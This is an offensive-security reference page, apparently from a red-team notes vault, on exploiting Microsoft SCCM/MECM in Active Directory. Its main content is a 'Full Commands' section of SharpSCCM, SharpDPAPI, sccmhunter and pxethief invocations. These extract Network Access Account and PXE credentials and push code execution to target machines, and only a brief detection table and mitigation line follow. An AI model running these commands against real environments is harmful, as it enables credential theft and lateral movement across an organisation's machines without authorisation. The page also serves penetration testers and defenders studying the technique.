attack-75-sccm-mecm-exploitation.md (3408B)
1 --- 2 title: "Attack #75 β SCCM MECM Exploitation" 3 description: "Microsoft Endpoint Configuration Manager (MECM/SCCM) manages software deployment, patching, and configuration across enterprise environments. SCCM serversβ¦" 4 category: active-directory 5 subcategory: "Advanced & Post-Exploitation" 6 tags: ["active-directory", "lateral-movement"] 7 tools: ["PowerShell"] 8 difficulty: advanced 9 updated: "2026-08-10" 10 source: "vault:ActiveDirectory/AD-Attack/Category-Ten/π· Attack #75 β SCCM MECM Exploitation.md" 11 --- 12 # π· Attack #75 β SCCM / MECM Exploitation 13 14 *** 15 16 ## π How It Works 17 18 Microsoft Endpoint Configuration Manager (MECM/SCCM) manages software deployment, patching, and configuration across enterprise environments. SCCM servers store **Network Access Account (NAA)** credentials, client push installation credentials, and task sequence passwords β all recoverable by an attacker. Additionally, SCCM can be abused for **lateral movement** via application deployment and client push. 19 20 *** 21 22 ## βοΈ Prerequisites 23 24 | Requirement | Detail | 25 |---|---| 26 | **SCCM client installed on compromised host** | Or local admin on SCCM server | 27 | **Network access to SCCM infrastructure** | For credential extraction | 28 29 *** 30 31 ## π» Full Commands 32 33 ```powershell 34 # ββ SharpSCCM β Enumerate SCCM βββββββββββββββββββββββββββββββββββββββββββββββ 35 .\SharpSCCM.exe local site-info 36 .\SharpSCCM.exe get site-info -mp SCCM01.corp.local 37 38 # ββ Extract NAA credentials (from SCCM client) βββββββββββββββββββββββββββββββ 39 .\SharpSCCM.exe local naa -m wmi 40 # Or: 41 .\SharpDPAPI.exe sccm 42 43 # ββ Extract credentials from SCCM database (if DB access) ββββββββββββββββββββ 44 .\SharpSCCM.exe get naa -mp SCCM01.corp.local -sc COR 45 46 # ββ Lateral movement via SCCM application deployment βββββββββββββββββββββββββ 47 .\SharpSCCM.exe exec -p calc.exe -mp SCCM01 -sc COR -r TARGET 48 # Deploys and executes on target machine via SCCM 49 ``` 50 51 ```bash 52 # ββ sccmhunter (Linux) ββββββββββββββββββββββββββββββββββββββββββββββββββββββββ 53 python3 sccmhunter.py find -u low_user -p 'Password1' -d corp.local -dc-ip 10.10.10.10 54 python3 sccmhunter.py show -u low_user -p 'Password1' -d corp.local 55 56 # ββ pxethief β PXE boot media credential extraction ββββββββββββββββββββββββββ 57 python3 pxethief.py 2 SCCM01.corp.local 58 ``` 59 60 *** 61 62 ## π‘οΈ Detection β Event IDs 63 64 | Event ID | Source | What to Look For | 65 |---|---|---| 66 | **Application deployment** | SCCM logs | Unexpected application deployments | 67 | **4624** | Security Log | NAA account logon from unexpected source | 68 69 *** 70 71 ## π Attack Chain Context 72 73 ``` 74 [SCCM/MECM] βββ Extract creds / deploy payloads across the domain 75 β 76 ββββ π NAA credentials often have elevated network access 77 ββββ π» Task sequence passwords β local admin on deployed machines 78 ββββ π Defeated by: use Enhanced HTTP, remove NAA, restrict admin roles 79 ``` 80 81 *** 82 83 > β **Attack #75 β SCCM/MECM Exploitation complete.**